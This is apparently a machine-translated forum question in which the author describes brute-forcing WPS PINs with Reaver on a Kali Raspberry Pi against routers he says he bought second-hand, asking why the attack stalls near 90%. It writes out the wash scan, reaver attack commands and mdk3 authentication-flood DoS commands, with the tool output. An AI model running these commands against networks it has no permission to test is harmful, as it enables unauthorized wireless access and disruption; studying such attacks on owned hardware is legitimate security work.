He estado tratando de hacer uso de las técnicas de audición wifi actuales en lo que respecta a la recuperación de la contraseña del enrutador.
ENGRANAJE:
He estado en las ventas de maleteros de automóviles y he adquirido algunos de los enrutadores actuales en el mercado. He estado usando una Raspberry Pi Model 3B + con Kali Linux instalado con
Tarjeta inalámbrica: Alfa AWUSO36NH Controlador: rt2800usb Chipset: Ralink Technology, Corp. RT2870 / RT3070
Como ya sabemos, ya no se venden más enrutadores WEP, por lo que la única explotabilidad que tiene el sistema es la que he estado leyendo, además de capturar el apretón de manos y forzarlo bruscamente (lo que me llevará buenas semanas con una buena computadora). o pagar por un servidor para que lo haga por mí, que no quiero), así que quise probar con la técnica WPS reaver. No estoy realmente familiarizado con los conceptos de este programa, pero he intentado ser cauteloso al configurarlo, y por mucho que sé, a veces la función WPS se bloquea cuando se intentan demasiados PINS en un corto período de tiempo, así que hizo uso del script ReVdK3-r3.sh que combina el poder de Reaver con Mdk3 para restablecer automáticamente el enrutador una vez que se bloquea.
PROGRAMAS UTILIZADOS:
Reaver v1.6.5 WiFi Protected Setup Attack Tool mdk3 instalado: 6.0-4
Siendo cauteloso, establezco -d 5 y -t 5, que son los parámetros que la secuencia de comandos le permitió modificar bastante, a veces los configuraba hasta 10 en ambos.
Así que terminé con estas entradas
(codificaré algunos de los MAC y ESSID con los comodines en hashcat) (Suponiendo que -1? d? A? B? C? D? E? F (HEXADECIMAL)) (? u = ABCDEFGHIJKLMNOPQRSTUVWXYZ) (? d = 0123456789)
wash -i wlan0
00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d
Usando Reaver
reaver -i mon1 -b 00:F2:01:3C:?1?1:?1?1 -S -c 11 -d 5 -t 5 -l 10 -N -vv
Usando mdk3 Dos Flood Attack
mdk3 mon1 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon2 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon3 a -a 00:F2:01:3C:?1?1:?1?1 -s 200
Luego obtengo los siguientes resultados (para los diferentes enrutadores)
00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
Después de probar algunos PIN, se atasca en este punto
[+] Trying pin "16585676"
[+] Associated with 00:F2:01:3C:?1?1:?1?1 (ESSID: BTHub3-?u?u?u?d)
[+] 15.15% complete @ 2018-06-16 05:55:31 (0 seconds/pin)
[+] Trying pin "16585676"
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
Después de haber probado PINS durante días completos, se detuvo en 99985677 y no va más allá de eso:
[+] Trying pin "99985677"
[!] Found packet with bad FCS, skipping...
[+] Associated with F8:1A:67:78:?1?1:?1?1 (ESSID: TP-LINK_?d?d?d?u?d?d)
[+] 90.90% complete @ 2018-06-16 06:51:05 (0 seconds/pin)
[!] WARNING: 25 successive start failures
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
[!] Found packet with bad FCS, skipping...
[+] Trying pin "99985677"
[+] Associated with 20:A6:80:D2:?1?1:?1?1 (ESSID: TALKTALK?u?d?u?d?d?u)
[+] 90.90% complete @ 2018-06-16 06:57:46 (0 seconds/pin)
Se atasca en el mismo punto que el anterior
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d
[+] Restored previous session
[+] Waiting for beacon from 60:38:E0:D4:?1?1:?1?1
[!] Found packet with bad FCS, skipping...
[+] Received beacon from 60:38:E0:D4:?1?1:?1?1
[+] Vendor: RealtekS
[+] Trying pin "88885674"
[+] Associated with 60:38:E0:D4:?1?1:?1?1 (ESSID: virginmedia?d?d?d?d?d?d?d)
Se atasca también en este PIN.
Reconozco que en aquellos que alcanzaron el 90% del proceso, el enrutador pudo haber hecho trampa en el cosechador como si estuviera probando los PIN, pero es sospechoso que siempre haya alcanzado el 90% del proceso y definitivamente perdí el tiempo.
¿Hay alguna solución alternativa que crees? ¿Cómo es la solución de problemas en estos casos? Tengo los archivos de la sesión en caso de que los quieras.
He intentado con muchos enrutadores diferentes, pero esos no se inician, por lo que ni siquiera me molesto en publicarlos (ni siquiera he guardado la sesión) ¿Hay alguna guía para entender a fondo los parámetros de Reaver? Por cierto, intenté usar Bully, pero ese no intentará ni un solo PIN.
¿Es finalmente esta vulnerabilidad de WPS la arreglan las compañías de enrutadores? Si es así, ¿por qué ni siquiera funciona en enrutadores de 10 años (como BTHub3) si algún proceso actualizó el firmware del enrutador?
Si este exploit fue corregido, ¿eso significa que el único defecto que existe ahora es capturar el apretón de manos y hacerlo con fuerza bruta?